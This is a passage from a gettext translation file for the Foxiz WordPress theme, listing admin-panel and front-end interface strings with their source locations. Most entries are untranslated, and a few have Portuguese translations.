backend/panels/amp.php:15 msgid "" "The AMP plugin not found! Accelerated Mobile Pages support, Please install " "and activate Automattic AMP plugin to activate settings below." msgstr "" #: backend/panels/single-post.php:385 msgid "" "The author box requests author information (Users > Profile) for displaying." msgstr "" #: backend/panels/general.php:27 msgid "" "The back to top will be invisible on the mobile because it is not helpful." msgstr "" #: backend/panels/design.php:32 msgid "The category label display in the post listing." msgstr "" #: backend/panels/header.php:334 msgid "The center logo style is best suited for small width logos." msgstr "" #: includes/sidebars.php:71 msgid "The default sidebar of your website" msgstr "" #: backend/panels/heading.php:114 msgid "The default tag is H4." msgstr "" #: backend/panels/optimized.php:92 msgid "" "The dynamic file CSS may not apply immediately on some servers due to the " "server cache." msgstr "" #: backend/install-plugins.php:76 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with Foxiz: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:360 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with this theme: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:400 #: backend/class-tgm-plugin-activation.php:3046 msgid "The following plugin was activated successfully:" msgstr "" #: backend/class-tgm-plugin-activation.php:378 backend/install-plugins.php:74 #, php-format msgid "The following recommended plugin is currently inactive: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:372 backend/install-plugins.php:73 #, php-format msgid "The following required plugin is currently inactive: %1$s." msgstr "" #: backend/panels/typography.php:490 msgid "The font size will use the post entry meta font size setting." msgstr "" #: includes/sidebars.php:97 msgid "The full width section at the top of the footer." msgstr "" #: backend/panels/heading.php:17 msgid "The global heading settings for blocks, widgets, archives." msgstr "" #: backend/panels/header.php:42 msgid "The global settings will apply whole the website." msgstr "" #: backend/panels/header.php:189 msgid "" "The heading will show in the \"More\" section and \"Mobile Header Collapse\" " "section." msgstr "" #: backend/panels/blog-pages.php:2382 msgid "" "The image will be limited at 300px of height. Recommended image height is " "about 600px for the retina screen." msgstr "" #: backend/class-tgm-plugin-activation.php:3601 msgid "" "The installation and activation process is starting. This process may take a " "while on some hosts, so please be patient." msgstr "" #: backend/class-tgm-plugin-activation.php:3597 #, php-format msgid "The installation of %1$s failed." msgstr "" #: backend/class-tgm-plugin-activation.php:3609 msgid "" "The installation process is starting. This process may take a while on some " "hosts, so please be patient." msgstr "" #: backend/panels/single-post.php:46 msgid "" "The layout automatically rollback to the \"Classic\" if featured image isn't " "set." msgstr "" #: backend/panels/ads.php:478 backend/panels/newsletter.php:78 msgid "The period to redisplay the popup when visitors closed it." msgstr "" #: backend/panels/design.php:687 msgid "The recommended value is 1 to 20. Leave blank to set it as the default." msgstr "" #: backend/panels/single-post.php:1277 msgid "" "The related box will not appear on post have number of paragraph less than " "this setting." msgstr "" #: backend/class-tgm-plugin-activation.php:1030 msgid "" "The remote plugin package consists of more than one file, but the files are " "not packaged in a folder." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 msgid "" "The remote plugin package does not contain a folder with the desired slug " "and renaming did not work." msgstr "" #: backend/panels/single-post.php:1169 msgid "The Score (1 > 10)" msgstr "" #: includes/sidebars.php:165 msgid "" "The section at the bottom of the single post content. It usually uses to " "display adverts or the post related shortcode." msgstr "" #: includes/sidebars.php:156 msgid "" "The section at the top of the single post content. It usually uses to " "display adverts" msgstr "" #: backend/panels/design.php:575 msgid "The setting below applies to the post title and hyperlinks." msgstr "" #: backend/panels/design.php:593 msgid "The setting below applies to top level menu items." msgstr "" #: backend/panels/single-post.php:1542 msgid "The setting below will apply to the single post pages." msgstr "" #: backend/panels/blog-pages.php:366 backend/panels/blog-pages.php:853 #: backend/panels/blog-pages.php:1267 backend/panels/blog-pages.php:1675 #: backend/panels/blog-pages.php:2167 msgid "" "The setting will not apply if the selected blog layout does not support the " "selected entry category." msgstr "" #: backend/panels/single-post.php:1268 msgid "" "The setting will not apply to posts have been added shortcode directly into " "content." msgstr "" #: backend/panels/blog-pages.php:590 msgid "The settings below apply the blog page." msgstr "" #: backend/panels/typography.php:637 msgid "The settings below apply to all button on your website." msgstr "" #: backend/panels/typography.php:36 msgid "" "The settings below apply to almost post and page content on your website." msgstr "" #: backend/panels/header-style.php:263 msgid "The settings below apply to the \"Transparent Header 1,2 and 3\"." msgstr "" #: backend/panels/blog-pages.php:2377 msgid "The settings below apply to the 404 page." msgstr "" #: backend/panels/blog-pages.php:1066 msgid "The settings below apply to the author pages." msgstr "" #: backend/panels/typography.php:854 msgid "The settings below apply to the breadcrumb bar." msgstr "" #: backend/panels/header-style.php:18 msgid "The settings below apply to the header style 1, 2 and 3." msgstr "" #: backend/panels/header-style.php:312 msgid "The settings below apply to the header style 4." msgstr "" #: backend/panels/header-style.php:563 msgid "The settings below apply to the header style 5." msgstr "" #: backend/panels/typography.php:594 msgid "" "The settings below apply to the input and textarea form on your website." msgstr "" #: backend/panels/header.php:309 msgid "The settings below apply to the mobile header." msgstr "" #: backend/panels/blog-pages.php:1888 msgid "The settings below apply to the search page." msgstr "" #: backend/panels/page.php:18 msgid "The settings below apply to the single page." msgstr "" #: backend/single-metaboxes.php:300 msgid "" "The settings below apply to the standard post format. Using the " "corresponding panel if you select another post format for this post." msgstr "" #: backend/panels/blog-pages.php:1481 msgid "The settings below apply to the tags and other archive pages." msgstr "" #: backend/panels/logo.php:31 msgid "The settings below apply to whole your website." msgstr "" #: backend/panels/ads.php:174 backend/panels/ads.php:363 msgid "" "The settings below will apply if you choose the \"Custom Image\" ad type." msgstr "" #: backend/panels/ads.php:117 backend/panels/ads.php:306 msgid "The settings below will apply if you choose the \"Script\" ad type." msgstr "" #: backend/panels/blog-pages.php:197 backend/panels/blog-pages.php:245 #: backend/panels/blog-pages.php:299 backend/panels/blog-pages.php:342 #: backend/panels/blog-pages.php:542 backend/panels/blog-pages.php:732 #: backend/panels/blog-pages.php:786 backend/panels/blog-pages.php:829 #: backend/panels/blog-pages.php:1030 backend/panels/blog-pages.php:1146 #: backend/panels/blog-pages.php:1200 backend/panels/blog-pages.php:1243 #: backend/panels/blog-pages.php:1443 backend/panels/blog-pages.php:1554 #: backend/panels/blog-pages.php:1608 backend/panels/blog-pages.php:1651 #: backend/panels/blog-pages.php:1851 backend/panels/blog-pages.php:2046 #: backend/panels/blog-pages.php:2100 backend/panels/blog-pages.php:2143 msgid "" "The settings below will be not available if you use \"Global WP Query " "Template Shortcode\" to build the blog listing." msgstr "" #: backend/category-settings.php:19 msgid "" "The settings below will override on the default settings in \"Theme Options >" " Category\"." msgstr "" #: templates/popup.php:108 msgid "" "The short code is incorrect or empty form. Please check the setting again!" msgstr "" #: backend/panels/typography.php:699 msgid "" "The single headline will use H1 font settings as the default. You can " "override the settings in this panel." msgstr "" #: backend/panels/typography.php:756 msgid "" "The single tagline will use the H2 tag font settings. You can override " "settings in this panel." msgstr "" #: backend/panels/design.php:667 msgid "" "The small border style in featured images and other element whole the " "website." msgstr "" #: backend/panels/single-post.php:1168 msgid "The Star (1 > 5)" msgstr "" #: includes/sidebars.php:87 msgid "The submenu section when hovering on the more button." msgstr "" #: backend/panels/blog-pages.php:198 msgid "" "The theme supports heading dynamic content, Please read the documentation " "for further information." msgstr "" #: backend/panels/breadcrumb.php:16 msgid "" "The theme supports Navxt plugin Yoast SEO and Rank Math SEO breadcrumbs." msgstr "" #: backend/panels/optimized.php:82 msgid "" "The theme will load default fonts to render some elements as heading tags, " "body, meta." msgstr "" #: backend/panels/blog-pages.php:343 backend/panels/blog-pages.php:830 #: backend/panels/blog-pages.php:1244 backend/panels/blog-pages.php:1652 #: backend/panels/blog-pages.php:2144 backend/panels/bookmark.php:244 #: backend/panels/bookmark.php:692 msgid "" "The theme will use \"Standard Blog Design\" settings to render block. You " "can override settings in the panel below." msgstr "" #: backend/single-metaboxes.php:886 msgid "" "The transparent headers is only suitable for layouts: Standard 2, Standard 5," " Video 2 and Audio 2." msgstr "" #: backend/panels/single-post.php:1558 msgid "" "The transparent headers is only suitable with layouts: Standard 2, Video 2 " "and Audio 2." msgstr "" #: backend/single-metaboxes.php:109 msgid "" "The transparent headers is only suitable with the page has a sliders or wide " "image at the top." msgstr "" #: backend/panels/design.php:16 msgid "Theme Design" msgstr "" #: backend/theme-options.php:240 backend/theme-options.php:241 msgid "Theme Options" msgstr "" #: backend/class-tgm-plugin-activation.php:408 msgid "" "There are one or more required or recommended plugins to install, update or " "activate." msgstr "" #: backend/class-tgm-plugin-activation.php:366 #, php-format msgid "There is an update available for: %1$s." msgstr "" #: backend/panels/blog-pages.php:19 msgid "" "These are global category settings. The settings below will apply to all " "category pages." msgstr "" #: backend/panels/block-grid.php:515 msgid "" "These are settings for the boxed grid 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:702 msgid "" "These are settings for the boxed grid 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:366 msgid "" "These are settings for the boxed list 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:561 msgid "" "These are settings for the boxed list 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-classic.php:20 msgid "" "These are settings for the Classic (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-grid.php:20 msgid "" "These are settings for the Grid 1 (standard). It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:185 msgid "" "These are settings for the grid 2 layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:20 msgid "" "These are settings for the list 1 (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-list.php:193 msgid "" "These are settings for the list 2. It will be overridden by the \"Block " "Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive " "pages)." msgstr "" #: backend/panels/block-grid.php:350 msgid "" "These are settings for the small grid layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)" msgstr "" #: backend/panels/design.php:90 msgid "" "These are small elements that display in the post listing ie: author name, " "date, total views, total comments..." msgstr "" #: backend/panels/breadcrumb.php:24 msgid "" "These settings below require to activate Navxt plugin Yoast SEO and Rank " "Math SEO breadcrumbs in order to work." msgstr "" #: bookmark/bookmark.php:174 msgid "This article has been added to reading list" msgstr "" #: bookmark/bookmark.php:190 msgid "This article was removed from reading list" msgstr "" #: bookmark/bookmark.php:209 msgid "This article was removed from your bookmark" msgstr "" #: templates/parts.php:116 #, php-format msgid "" "This block requests at least %s posts, Please add new posts for this query " "or change the block settings: " msgstr "" #: backend/panels/optimized.php:254 msgid "" "This image is used if the post/page being shared does not contain featured " "images." msgstr "" #: backend/panels/single-post.php:1233 msgid "This is a global option to disable all comments on posts & page..." msgstr "" #: backend/panels/sidebar.php:28 msgid "" "This is the global option and will be overridden by individual \"Sidebar " "Position\" settings." msgstr "" #: backend/single-metaboxes.php:284 msgid "" "This option is useful in case you would like to create a custom entry meta." msgstr "" #: backend/panels/newsletter.php:105 msgid "" "This option use for \"Scroll Distance\" mode. Input a distance value (px) " "when visitor scrolling down to show the popup." msgstr "" #: backend/panels/newsletter.php:112 msgid "" "This option use for \"Time Delay\" mode. Input a delay time (ms) value to " "show the popup after the site loaded." msgstr "" #: backend/panels/design.php:329 msgid "" "This option will help you optimize the site speed or increase image quality " "on your website." msgstr "" #: backend/class-tgm-plugin-activation.php:615 msgid "This plugin needs to be updated to be compatible with your theme." msgstr "" #: backend/panels/ads.php:86 msgid "" "This section supports ads in the top header website. For other ad spots, " "please read the theme documentation for further info." msgstr "" #: backend/panels/ads.php:274 msgid "" "This section supports ads inside single post content, after x paragraphs. " "For other ad spots, please read the theme documentation for further info." msgstr "" #: backend/panels/header.php:639 msgid "" "This section will show a small alert or event at the bottom of the " "navigation." msgstr "" #: backend/panels/header.php:264 msgid "This section will show the user bookmark list and latest blog listing." msgstr "" #: backend/panels/header.php:620 msgid "This setting apply to the logout button in the logged user dropdown." msgstr "" #: backend/panels/header.php:61 msgid "" "This setting requires to set \"Use Ruby Template\" in the setting above in " "order to work." msgstr "" #: backend/panels/color.php:125 backend/panels/color.php:142 msgid "This setting will apply to the default mode." msgstr "" #: backend/panels/blog-pages.php:155 msgid "" "This setting will be overridden by \"Global WP Query Template Shortcode\" in " "the individual category setting panel." msgstr "" #: backend/panels/blog-pages.php:121 msgid "" "This setting will be overridden by \"template shortcode\" in the individual " "category setting panel." msgstr "" #: backend/panels/table-contents.php:150 msgid "This setting will not apply to the full width 2 columns layout." msgstr "" #: backend/panels/single-post.php:499 msgid "" "This setting will only apply on the desktop devices. Navigate to " "\"Typography > Entry Category\" to set for tablet mobile devices." msgstr "" #: backend/panels/blog-pages.php:179 backend/panels/blog-pages.php:715 #: backend/panels/blog-pages.php:1130 msgid "" "This setting will override on \"Dashboard > Settings > Reading > Blog pages " "show at most\" setting. It also apply to the \"Global WP Query Template " "Shortcode\"." msgstr "" #: backend/mega-menu.php:198 msgid "This setting will override on above settings." msgstr "" #: backend/panels/blog-pages.php:62 backend/panels/blog-pages.php:628 #: backend/panels/blog-pages.php:1946 msgid "" "This setting will override on the \"Header Style\" setting, Leave it blank " "if you would like to use the \"Header Style\" setting." msgstr "" #: backend/panels/blog-pages.php:47 backend/panels/blog-pages.php:613 #: backend/panels/blog-pages.php:1931 msgid "" "This setting will override on the setting in the header panel. It will not " "apply to the header style 4." msgstr "" #: backend/class-tgm-plugin-activation.php:354 #, php-format msgid "This theme recommends the following plugin: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:348 #, php-format msgid "This theme requires the following plugin: %1$s." msgstr "" #: backend/panels/newsletter.php:97 msgid "Time Delay" msgstr "" #: backend/panels/adblock.php:26 backend/panels/newsletter.php:34 msgid "Title" msgstr "" #: backend/category-settings.php:433 backend/panels/block-classic.php:120 #: backend/panels/block-grid.php:120 backend/panels/block-grid.php:285 #: backend/panels/block-grid.php:450 backend/panels/block-grid.php:623 #: backend/panels/block-grid.php:810 backend/panels/block-list.php:128 #: backend/panels/block-list.php:301 backend/panels/block-list.php:482 #: backend/panels/block-list.php:677 backend/panels/blog-pages.php:460 #: backend/panels/blog-pages.php:947 backend/panels/blog-pages.php:1361 #: backend/panels/blog-pages.php:1769 backend/panels/blog-pages.php:2261 #: backend/panels/bookmark.php:359 backend/panels/bookmark.php:807 msgid "Title HTML Tag" msgstr "" #: backend/class-tgm-plugin-activation.php:2494 #, php-format msgid "To Activate (%s)" msgstr "" #: backend/panels/header.php:121 msgid "" "To add column widgets, navigate to \"Dashboard > Appearance > Widgets > More " "Menu Section\". Please read the documentation for further information." msgstr "" #: backend/panels/footer.php:92 msgid "To add content, please navigate to Appearance > Widgets." msgstr "" #: backend/panels/logo.php:39 msgid "" "To add the favicon, navigate to \"Appearance > Customize > Site Identity > " "Site Icon\". Please read the documentation for further information." msgstr "" #: backend/panels/design.php:40 msgid "" "To edit color for individual category, navigate to \"Admin Dashboard > Posts " "> Categories > Edit\"." msgstr "" #: backend/panels/blog-pages.php:25 msgid "" "To edit for individual category, navigate to \"Admin Dashboard > Posts > " "Categories > Edit\"." msgstr "" #: backend/panels/single-post.php:1550 msgid "" "To edit for individual post, navigate to \"Posts > Edit > Post Options > " "Site Header\"." msgstr "" #: backend/panels/heading.php:29 msgid "" "To edit the heading typography, navigate to \"Typography > Block Heading\"." msgstr "" #: backend/panels/header.php:182 msgid "" "To edit the placeholder text of the search form, navigate to \"Theme Options " "> General > Search Placeholder\"." msgstr "" #: backend/panels/single-post.php:524 msgid "" "To edit the tagline typography, navigate to \"Typography > Headline & " "Tagline > Single Tagline\"." msgstr "" #: backend/panels/header.php:315 msgid "" "To edit the typography, navigate to \"Typography > Menu > Mobile Menu " "Settings\". Navigate to \"Social Profiles\" for the social list." msgstr "" #: backend/panels/sidebar.php:21 msgid "" "To edit the widget heading layout, navigate to \"Heading Design > Sidebar " "Widget Heading\"." msgstr "" #: backend/class-tgm-plugin-activation.php:2486 #, php-format msgid "To Install (%s)" msgstr "" #: backend/panels/amp.php:132 msgid "" "To setup the copyright area, Please navigate to Footer > Copyright Section." msgstr "" #: backend/panels/single-post.php:1260 msgid "" "To use the shortcode, read the documentation \"Related Box Shortcode\" for " "further information." msgstr "" #: backend/panels/header.php:203 msgid "Toggle Mode" msgstr "" #: backend/panels/general.php:17 msgid "Tooltips" msgstr "" #: backend/configs.php:376 msgid "Top" msgstr "" #: backend/panels/blog-pages.php:643 msgid "Top & Bottom Area Template Builder" msgstr "" #: backend/panels/header-style.php:618 msgid "Top & Bottom Border" msgstr "" #: backend/configs.php:377 msgid "Top (Big Icon)" msgstr "" #: backend/panels/amp.php:420 msgid "Top - Ad Type" msgstr "" #: backend/panels/amp.php:448 msgid "Top - Adsense Size" msgstr "" #: backend/panels/amp.php:460 msgid "Top - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:432 msgid "Top - Data Ad Client" msgstr "" #: backend/panels/amp.php:440 msgid "Top - Data Ad Slot" msgstr "" #: backend/category-settings.php:129 backend/panels/blog-pages.php:649 msgid "Top Area Template Shortcode" msgstr "" #: backend/panels/footer.php:53 msgid "Top Border" msgstr "" #: backend/single-metaboxes.php:681 msgid "Top Entry Widgets Area" msgstr "" #: includes/menu.php:302 msgid "Top News" msgstr "" #: backend/panels/single-post.php:706 msgid "Top Share Bar" msgstr "" #: backend/panels/amp.php:414 msgid "Top Single Content Ad Settings" msgstr "" #: backend/panels/ads.php:77 backend/panels/privacy.php:25 msgid "Top Site" msgstr "" #: backend/single-metaboxes.php:142 backend/single-metaboxes.php:919 msgid "Top Site Advert" msgstr "" #: backend/category-settings.php:124 backend/panels/blog-pages.php:114 msgid "Top Template Builder" msgstr "" #: backend/panels/woocommerce.php:147 msgid "Total Related Products" msgstr "" #: backend/configs.php:80 msgid "Transparent - Style 1" msgstr "" #: backend/configs.php:81 msgid "Transparent - Style 2" msgstr "" #: backend/configs.php:82 msgid "Transparent - Style 3" msgstr "" #: backend/panels/header-style.php:262 msgid "Transparent Colors" msgstr "" #: backend/panels/logo.php:125 msgid "Transparent Logo" msgstr "" #: backend/panels/logo.php:115 msgid "Transparent Logos" msgstr "" #: backend/panels/logo.php:133 msgid "Transparent Retina Logo" msgstr "" #: backend/panels/header.php:547 msgid "Trigger Button Layout" msgstr "" #: backend/panels/single-post.php:768 backend/panels/single-post.php:907 #: backend/panels/single-post.php:1045 backend/panels/single-post.php:1673 #: templates/parts.php:609 msgid "Tumblr" msgstr "" #: backend/panels/socials.php:68 msgid "Tumblr URL " msgstr "" #: backend/panels/single-post.php:732 backend/panels/single-post.php:871 #: backend/panels/single-post.php:1009 backend/panels/single-post.php:1641 #: templates/parts.php:594 msgid "Twitter" msgstr "" #: backend/panels/socials.php:35 msgid "Twitter URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2643 msgid "Type" msgstr "" #: backend/panels/typography.php:13 msgid "Typography" msgstr "" #: backend/panels/single-post.php:245 msgid "Underline Color" msgstr "" #: bookmark/bookmark.php:57 msgid "Undo" msgstr "" #: templates/parts.php:803 msgid "Unfollow" msgstr "" #: backend/class-tgm-plugin-activation.php:2576 msgid "unknown" msgstr "" #: backend/panels/sidebar.php:37 msgid "Unlimited Sidebars" msgstr "" #: backend/class-tgm-plugin-activation.php:2817 msgid "Update" msgstr "" #: backend/configs.php:408 backend/panels/design.php:274 msgid "update (Last Updated)" msgstr "atualização (última atualização)" #: backend/class-tgm-plugin-activation.php:2702 #, php-format msgid "Update %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2490 #, php-format msgid "Update Available (%s)" msgstr "" #: backend/class-tgm-plugin-activation.php:2427 msgid "Update recommended" msgstr "" #: backend/class-tgm-plugin-activation.php:616 msgid "Update Required" msgstr "" #: templates/single/templates.php:456 msgid "Updated" msgstr "Atualizado" #: backend/panels/design.php:117 msgid "Updated Date Icon" msgstr "" #: backend/class-tgm-plugin-activation.php:3592 #, php-format msgid "Updating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:344 #, php-format msgid "Updating Plugin: %s" msgstr "" #: backend/class-tgm-plugin-activation.php:2778 msgid "Upgrade message from the plugin author:" msgstr "" #: backend/single-metaboxes.php:535 msgid "Upload a background header image for this review section." msgstr "" #: backend/panels/blog-pages.php:1983 msgid "Upload a background image for the search header in the dark mode." msgstr "" #: backend/panels/blog-pages.php:1969 msgid "Upload a background image for the search header." msgstr "" #: backend/panels/blog-pages.php:2399 msgid "Upload a header image for the 404 page in the dark mode." msgstr "" #: backend/panels/blog-pages.php:2391 msgid "Upload a header image for the 404 page." msgstr "" #: backend/panels/bookmark.php:129 backend/panels/bookmark.php:472 msgid "Upload a image for displaying at the top heading in the dark mode." msgstr "" #: backend/panels/bookmark.php:121 backend/panels/bookmark.php:464 msgid "Upload a image for displaying at the top heading. Image height is 60px." msgstr "" #: backend/panels/logo.php:126 msgid "" "Upload a light logo for transparent headers. Recommended logo height value " "is 60px, allowed extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/logo.php:104 msgid "" "Upload a light retina logo for displaying in mobile device. It should be " "same dimensions with the mobile logo." msgstr "" #: backend/panels/logo.php:134 msgid "" "Upload a light retina logo for transparent headers. Recommended logo height " "value is 120px." msgstr "" #: backend/panels/logo.php:96 msgid "" "Upload a logo for the mobile device. Recommended logo height value is 84px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/footer.php:153 msgid "" "Upload a small dark logo to display at bottom of the footer in the dark mode." msgstr "" #: backend/panels/footer.php:145 msgid "Upload a small logo to display at bottom of the footer." msgstr "" #: backend/panels/amp.php:92 msgid "Upload AMP footer logo." msgstr "" #: backend/category-settings.php:87 msgid "Upload featured images (maximum: 2 images) for this category." msgstr "" #: backend/single-metaboxes.php:433 msgid "Upload Gallery" msgstr "" #: backend/panels/logo.php:160 msgid "" "Upload icon for the Apple touch (72 x 72px), allowed extensions are .jpg, ." "png, .gif" msgstr "" #: backend/panels/logo.php:168 msgid "" "Upload icon for the Metro interface (144 x 144px), allowed extensions are ." "jpg, .png, .gif" msgstr "" #: backend/single-metaboxes.php:643 msgid "" "Upload the sponsor light logo for this post, recommended height for the logo " "is 52px." msgstr "" #: backend/single-metaboxes.php:637 msgid "" "Upload the sponsor logo for this post, recommended height for the logo is " "52px." msgstr "" #: backend/panels/ads.php:187 backend/panels/ads.php:376 msgid "Upload your ad image in the dark mode." msgstr "" #: backend/panels/ads.php:180 backend/panels/ads.php:369 msgid "Upload your ad image." msgstr "" #: backend/single-metaboxes.php:399 msgid "Upload your audio file, support: mp3, ogg, wma, m4a, wav files." msgstr "" #: backend/panels/login.php:67 msgid "Upload your background for the logo screen." msgstr "" #: backend/single-metaboxes.php:434 msgid "Upload your images for this gallery." msgstr "" #: backend/panels/login.php:52 msgid "" "Upload your logo for the logo screen. This option will override on wordpress " "logo." msgstr "" #: backend/single-metaboxes.php:339 msgid "" "Upload your preview video. Keep video short and lightweight as possible to " "save server bandwidth." msgstr "" #: backend/single-metaboxes.php:351 msgid "Upload your video file, support: mp4, m4v, webm, ogv, wmv, flv files." msgstr "" #: backend/panels/ads.php:124 backend/panels/ads.php:313 msgid "Use Adsense units code to ensure it display exactly where you put." msgstr "" #: backend/configs.php:359 msgid "Use Custom" msgstr "" #: backend/category-settings.php:105 backend/panels/blog-pages.php:1225 #: backend/panels/breadcrumb.php:54 backend/panels/breadcrumb.php:65 #: backend/panels/breadcrumb.php:76 backend/panels/breadcrumb.php:87 #: backend/panels/breadcrumb.php:98 backend/panels/page.php:85 #: backend/panels/single-post.php:452 msgid "Use Global Setting" msgstr "" #: backend/configs.php:223 msgid "Use Post Excerpt" msgstr "" #: backend/configs.php:86 backend/panels/footer.php:98 msgid "Use Ruby Template" msgstr "" #: backend/panels/header-style.php:114 backend/panels/header-style.php:402 #: backend/panels/header-style.php:439 backend/panels/header-style.php:669 #: backend/panels/header.php:410 msgid "use the option \"To\" to set a gradient background." msgstr "" #: backend/configs.php:224 msgid "Use Title Tagline" msgstr "" #: backend/panels/sidebar.php:49 msgid "" "Useful when a sidebar is too tall or too short compared to the rest of the " "content." msgstr "" #: backend/panels/header.php:609 msgid "User Dashboard Menu" msgstr "" #: backend/panels/bookmark.php:438 msgid "User Interests" msgstr "" #: backend/panels/single-post.php:1175 backend/panels/single-post.php:1219 #: backend/single-metaboxes.php:483 msgid "User Rating in Comments" msgstr "" #: backend/panels/reaction.php:16 backend/single-metaboxes.php:839 msgid "User Reaction" msgstr "" #: templates/single/reviews.php:242 msgid "User Votes" msgstr "" #: backend/class-tgm-plugin-activation.php:2647 msgid "Version" msgstr "" #: backend/configs.php:849 msgid "Vertical Banner (120 x 240)" msgstr "" #: templates/single/review-comment.php:94 msgid "Very Poor" msgstr "" #: backend/panels/single-post.php:312 msgid "Via Bar" msgstr "" #: backend/single-metaboxes.php:799 msgid "Via Name" msgstr "" #: backend/single-metaboxes.php:804 msgid "Via URL" msgstr "" #: templates/single/templates.php:701 msgid "VIA:" msgstr "Via:" #: backend/single-metaboxes.php:316 msgid "Video Format" msgstr "" #: backend/panels/design.php:477 msgid "Video Icon" msgstr "" #: backend/panels/design.php:498 msgid "Video Icon Color" msgstr "" #: backend/single-metaboxes.php:322 msgid "Video Layout" msgstr "" #: backend/panels/single-post.php:60 msgid "Video Post Format Layout" msgstr "" #: backend/panels/single-post.php:66 msgid "Video Post Layout" msgstr "" #: backend/single-metaboxes.php:331 msgid "Video URL" msgstr "" #: backend/configs.php:406 backend/panels/design.php:272 msgid "view (Post Views)" msgstr "" #: templates/header/templates.php:905 msgid "View Cart" msgstr "" #: templates/parts.php:636 msgid "Vimeo" msgstr "" #: backend/panels/socials.php:122 msgid "Vimeo URL " msgstr "" #: backend/panels/single-post.php:786 backend/panels/single-post.php:925 #: backend/panels/single-post.php:1063 backend/panels/single-post.php:1689 #: templates/parts.php:642 msgid "Vkontakte" msgstr "" #: backend/panels/socials.php:134 msgid "VKontakte URL " msgstr "" #: templates/single/reviews.php:245 msgid "vote" msgstr "" #: templates/single/reviews.php:247 msgid "votes" msgstr "" #: backend/panels/general.php:56 msgid "" "We recommend you should create a backup before updating or major changes." msgstr "" #: backend/panels/optimized.php:21 #, php-format msgid "" "We recommend you to refer this " "DOCUMENTATION to optimize for you website" msgstr "" #: templates/parts.php:588 msgid "Website" msgstr "" #: backend/panels/typography.php:27 msgid "Website Body" msgstr "" #: backend/panels/header.php:560 msgid "Welcome Back!" msgstr "" #: templates/single/templates.php:753 msgid "What do you think?" msgstr "O que você acha?" #: backend/panels/single-post.php:1348 msgid "What posts should be displayed in the related section." msgstr "" #: backend/panels/single-post.php:750 backend/panels/single-post.php:889 #: backend/panels/single-post.php:1027 backend/panels/single-post.php:1657 #: templates/parts.php:648 msgid "WhatsApp" msgstr "" #: backend/panels/socials.php:146 msgid "Whatsapp URL " msgstr "" #: backend/category-settings.php:418 backend/panels/block-classic.php:99 #: backend/panels/block-grid.php:99 backend/panels/block-grid.php:264 #: backend/panels/block-grid.php:429 backend/panels/block-grid.php:602 #: backend/panels/block-grid.php:789 backend/panels/block-list.php:107 #: backend/panels/block-list.php:280 backend/panels/block-list.php:461 #: backend/panels/block-list.php:656 backend/panels/blog-pages.php:444 #: backend/panels/blog-pages.php:931 backend/panels/blog-pages.php:1345 #: backend/panels/blog-pages.php:1753 backend/panels/blog-pages.php:2245 #: backend/panels/bookmark.php:343 backend/panels/bookmark.php:791 msgid "" "When you select \"use title tagline\". if it is empty, it will fallback to " "the post excerpt or content." msgstr "" #: backend/category-settings.php:417 backend/panels/block-classic.php:98 #: backend/panels/block-grid.php:98 backend/panels/block-grid.php:263 #: backend/panels/block-grid.php:428 backend/panels/block-grid.php:601 #: backend/panels/block-grid.php:788 backend/panels/block-list.php:106 #: backend/panels/block-list.php:279 backend/panels/block-list.php:460 #: backend/panels/block-list.php:655 backend/panels/blog-pages.php:443 #: backend/panels/blog-pages.php:930 backend/panels/blog-pages.php:1344 #: backend/panels/blog-pages.php:1752 backend/panels/blog-pages.php:2244 #: backend/panels/bookmark.php:342 backend/panels/bookmark.php:790 msgid "Where to get the post excerpt." msgstr "" #: backend/configs.php:847 msgid "Wide Skyscraper (160x600)" msgstr "" #: backend/panels/sidebar.php:55 msgid "Widget Block Editor" msgstr "" #: backend/panels/heading.php:112 msgid "Widget Heading HTML Tag" msgstr "" #: backend/panels/heading.php:95 msgid "Widget Heading Layout" msgstr "" #: backend/panels/footer.php:113 msgid "Widget Menu Font Size" msgstr "" #: backend/panels/single-post.php:165 msgid "Width Settings" msgstr "" #: backend/panels/reaction.php:48 msgid "Wink" msgstr "" #: backend/panels/woocommerce.php:28 msgid "WooCommerce" msgstr "" #: backend/panels/woocommerce.php:44 msgid "WooCommerce Pages" msgstr "" #: backend/panels/woocommerce.php:15 msgid "" "Woocommerce plugin not found! Please install and active Woocommerce to active settings " "below." msgstr "" #: backend/class-tgm-plugin-activation.php:2386 msgid "WordPress Repository" msgstr "" #: backend/panels/design.php:354 msgid "" "WordPress will crop uploaded images to ensure your website use the best " "image size for the blog layouts." msgstr "" #: backend/panels/design.php:165 msgid "Words per Minute" msgstr "" #: backend/panels/header-style.php:60 